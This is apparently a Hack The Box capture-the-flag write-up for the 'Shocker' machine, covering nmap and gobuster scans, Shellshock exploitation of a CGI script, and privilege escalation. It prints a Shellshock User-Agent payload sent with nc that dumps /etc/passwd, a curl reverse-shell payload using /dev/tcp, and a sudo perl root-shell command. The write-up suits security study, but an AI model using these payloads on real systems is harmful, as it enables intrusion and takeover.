Hack The Box - Shocker

We are going to pwn Shocker from Hack The Box.

Link : https://www.hackthebox.eu/home/machines/profile/108

Like always begin with our Nmap Scan.

Nmap Scan Results

80/tcp   open  http
2222/tcp open  EtherNetIP-1

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 4.2 (95%), Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.8 - 3.11 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check whats in the webpage

Like always lets try bruteforcing the webpage to find any interesting page.

Gobuster Results

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2019/12/02 21:00:28 Starting gobuster
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cgi-bin/ (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
2019/12/02 21:04:36 Finished

/cgi-bin is a folder used to house scripts that will interact with a Web browser to provide functionality for a Web page or website.

Checking ShellShock Exploit

May be if we found any scripts available on /cgi-bin/ we can do shellshock exploit as the name of the box Shocker gives us a clue.

Lets bruteforce /cgi-bin/ , I gave extensions as sh,py,pl to check for any scripts.

My guess is correct there is an user.sh script available

For more info


Getting Shell

There is a module for shellshock exploit, Lets fire up the metasploit

use exploit/multi/http/apache_mod_cgi_bash_env_exec

We need to give the location of the script in TARGETURI

Lets check first whether it is vulnerable or not! It is Vulnerable so run this and we can get an shell.

We have an user called shelly

Privilege Escaltion

I uploaded my Linux Enumeration Script and found that perl can run as root without password.

Lets check GTFOBins


sudo perl -e 'exec "/bin/sh";

Running this command will make us root

We got ROOT ~

Method 2 (Without Metasploit)

We can get shell without using metasploit

By injecting the UserAgent Manually I can read the /etc/passwd so by using this I can get reverse shell too.

root@kali:~/Downloads# echo -e "HEAD /cgi-bin/user.sh HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 80
HTTP/1.1 200 OK
Date: Tue, 07 Jul 2020 04:21:30 GMT
Server: Apache/2.4.18 (Ubuntu)
root: x:0:0:root:/root:/bin/bash
daemon: x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin: x:2:2:bin:/bin:/usr/sbin/nologin
sys: x:3:3:sys:/dev:/usr/sbin/nologin
sync: x:4:65534:sync:/bin:/bin/sync
games: x:5:60:games:/usr/games:/usr/sbin/nologin
man: x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp: x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail: x:8:8:mail:/var/mail:/usr/sbin/nologin
news: x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp: x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy: x:13:13:proxy:/bin:/usr/sbin/nologin
www-data: x:33:33:www-data:/var/www:/usr/sbin/nologin
backup: x:34:34:backup:/var/backups:/usr/sbin/nologin
list: x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc: x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats: x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody: x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync: x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network: x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve: x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy: x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog: x:104:108::/home/syslog:/bin/false
_apt: x:105:65534::/nonexistent:/bin/false
lxd: x:106:65534::/var/lib/lxd/:/bin/false
messagebus: x:107:111::/var/run/dbus:/bin/false
uuidd: x:108:112::/run/uuidd:/bin/false
dnsmasq: x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd: x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly: x:1000:1000:shelly,,,:/home/shelly:/bin/bash
Connection: close
Content-Type: text/x-sh



So All we need to do is run this command on our machine and listening on another terminal

curl -A '() { :; }; /bin/bash -i > /dev/tcp/ 0<&1 2>&1'

It is injecting on the User-Agent on the request header.

WE got shelly and Privilege Escalation is as same as before.